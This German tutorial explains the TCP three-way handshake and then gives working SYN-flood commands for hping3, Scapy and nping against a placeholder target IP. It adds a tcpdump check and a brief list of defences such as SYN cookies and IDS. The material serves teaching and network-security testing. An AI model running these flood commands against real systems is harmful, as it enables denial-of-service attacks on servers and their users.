3-Way-TCP-Handshakes mit SYN-Flooding-Angriffen prüfen

Einführung

Der TCP-3-Wege-Handshake ist ein grundlegender Mechanismus zur Herstellung einer TCP-Verbindung zwischen Client und Server. Angreifer können diesen Prozess jedoch durch SYN-Flooding-Angriffe ausnutzen, um Netzwerke zu stören oder lahmzulegen. In diesem Beitrag wird gezeigt, wie man mithilfe von Kali Linux Tools einen SYN-Flooding-Angriff durchführen kann.

Grundlagen des SYN-Flooding

Der TCP-3-Wege-Handshake besteht aus drei Schritten:

  1. SYN: Der Client sendet ein Synchronisationspaket (SYN) an den Server.
  2. SYN-ACK: Der Server antwortet mit einem SYN-ACK-Paket.
  3. ACK: Der Client bestätigt mit einem ACK-Paket.

Beim SYN-Flooding sendet der Angreifer kontinuierlich SYN-Pakete, ohne die Verbindung abzuschließen. Der Server hält Ressourcen für die unvollständigen Verbindungen bereit, was zu einer Überlastung führen kann.

Durchführung eines SYN-Flooding-Angriffs mit Kali Linux

Mit hping3

hping3 ist ein Tool zum Senden benutzerdefinierter TCP/IP-Pakete.

sudo hping3 -S --flood -V <Ziel-IP>

Optionen:

  • -S: Setzt das SYN-Flag.
  • --flood: Sendet Pakete ohne Pause.
  • -V: Verbose-Ausgabe für detaillierte Informationen.

Mit Scapy

Scapy ermöglicht das Erstellen und Senden von Paketen in Python.

sudo scapy

In der Scapy-Konsole:

send(IP(dst="<Ziel-IP>")/TCP(flags="S"), loop=1, verbose=0)

Parameter:

  • dst: Ziel-IP-Adresse.
  • flags="S": Setzt das SYN-Flag.
  • loop=1: Sendet Pakete in einer Schleife.
  • verbose=0: Deaktiviert Ausgaben.

Mit nping (Teil von Nmap)

nping ist ein Tool zum Generieren von Netzwerkpaketen und zur Messung der Netzwerkkonnektivität.

sudo nping --tcp -p <Ziel-Port> --flags syn -c 1000000 <Ziel-IP>

Optionen:

  • --tcp: Verwendet TCP-Protokoll.
  • -p: Zielport.
  • --flags syn: Setzt das SYN-Flag.
  • -c: Anzahl der Pakete.

Überprüfung des Angriffs

Mit Tools wie Wireshark oder tcpdump kann der Netzwerkverkehr überwacht werden, um den Effekt des SYN-Flooding zu beobachten.

sudo tcpdump -n -i <Netzwerkschnittstelle> tcp port <Ziel-Port> and tcp[tcpflags] & (tcp-syn) != 0

Sicherheitsmaßnahmen

Um sich gegen SYN-Flooding zu schützen, können folgende Maßnahmen ergriffen werden:

  • Aktivieren von SYN-Cookies.
  • Implementierung von Firewall-Regeln, die verdächtigen Traffic filtern.
  • Nutzung von Intrusion Detection Systems (IDS).

Tags

SYNFloodingTCPHandshakeKaliLinuxNetzwerksicherheithping3Scapynping

Network-Attacks-Overview 3-Wege-Tcp-Handshake